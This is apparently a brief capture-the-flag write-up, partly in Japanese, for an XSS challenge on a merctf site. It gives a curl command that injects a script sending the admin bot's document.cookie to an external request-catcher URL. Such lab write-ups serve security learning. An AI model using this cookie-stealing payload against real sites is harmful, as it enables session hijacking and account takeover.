Let's jump to a client-side challenge for XSS lovers. Just steal the admin (bot) cookie :ganbare:
URL: http://ezxss.merctf.com/test
URLにアクセスすると、よくわからないが/submit?solution=payload
でXSSしろということらしい。
以下のようにcookieを取得するXSSを打ち込んでやる(RequestBin.comなどで受信する)。
$ curl 'http://ezxss.merctf.com/submit?solution=<script>location.href="https://en43puqb75xk6.x.pipedream.net/?s="%2Bdocument.cookie</script>'
If it is correct, you should receive your flag, right?